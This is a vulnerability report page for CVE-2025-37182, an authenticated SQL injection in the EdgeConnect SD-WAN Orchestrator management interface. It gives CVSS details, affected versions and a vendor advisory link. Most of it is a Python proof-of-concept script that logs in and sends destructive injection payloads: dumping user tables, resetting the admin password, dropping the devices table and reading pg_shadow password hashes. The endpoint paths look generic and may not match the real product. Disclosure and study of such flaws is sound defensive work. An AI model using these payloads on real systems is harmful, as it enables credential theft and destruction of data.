Security Vulnerability Report
CVE-2025-37182 CVSS 7.2 HIGH


Published: 2026-01-14 17:16:06
Last Modified: 2026-01-20 18:17:31

Description

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Vector breakdown: network attack vector, low attack complexity, high privileges required (the attacker must already hold an authenticated, high-privilege account on the management interface), no user interaction, unchanged scope, and high confidentiality, integrity and availability impact. The high-privilege requirement is what keeps the base score at 7.2 despite the full C/I/A impact.
Weakness: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command).

Configurations (Affected Products)

cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE (versions 9.2.0 through 9.2.10, inclusive)
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE (versions 9.3.0 through 9.3.6, inclusive)
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE (versions 9.4.0 through 9.4.4, inclusive)
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE (versions 9.5.0 up to, but excluding, 9.5.6)
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:* - VULNERABLE
EdgeConnect SD-WAN Orchestrator: the version ranges above are those recorded in the NVD configuration data for this CVE; fixed versions should be confirmed against the HPE advisory at support.hpe.com.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-37182 SQL Injection PoC for EdgeConnect SD-WAN Orchestrator
# This PoC demonstrates the SQL injection vulnerability
# Note: This is for educational and authorized testing purposes only
import requests
import sys

# Endpoint paths as given in the original PoC
TARGET_URL = "https://<target-ip>/orchestrator/"
LOGIN_ENDPOINT = TARGET_URL + "api/v1/auth/login"
INJECT_ENDPOINT = TARGET_URL + "api/v1/devices/search"


def login(username, password):
    """Authenticate with valid credentials"""
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    try:
        # verify=False disables TLS certificate validation
        response = session.post(LOGIN_ENDPOINT, json=login_data, verify=False, timeout=10)
        if response.status_code == 200:
            return session, response.json().get('token')
        else:
            print(f"[-] Authentication failed: {response.status_code}")
            return None, None
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return None, None


def exploit_sql_injection(session, token):
    """Attempt SQL injection attack"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # SQL Injection payload examples
    payloads = [
        "'; SELECT * FROM users; --",
        "'; UPDATE users SET password='hacked' WHERE username='admin'; --",
        "'; DROP TABLE devices; --",
        "' UNION SELECT NULL,username,password FROM pg_shadow--"
    ]
    for payload in payloads:
        inject_data = {
            "query": payload,
            "limit": 100
        }
        try:
            response = session.post(INJECT_ENDPOINT, json=inject_data, headers=headers, verify=False, timeout=10)
            if response.status_code == 200:
                print(f"[+] Payload sent: {payload}")
                print(f"[+] Response: {response.text[:500]}")
        except Exception as e:
            print(f"[-] Error with payload {payload}: {e}")


def main():
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <username> <password>")
        sys.exit(1)
    username = sys.argv[1]
    password = sys.argv[2]
    print(f"[*] Authenticating as {username}...")
    session, token = login(username, password)
    if token:
        print("[+] Authentication successful!")
        print("[*] Attempting SQL injection...")
        exploit_sql_injection(session, token)
    else:
        print("[-] Exploitation failed - authentication required")


if __name__ == "__main__":
    main()
```

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US (Vendor Advisory)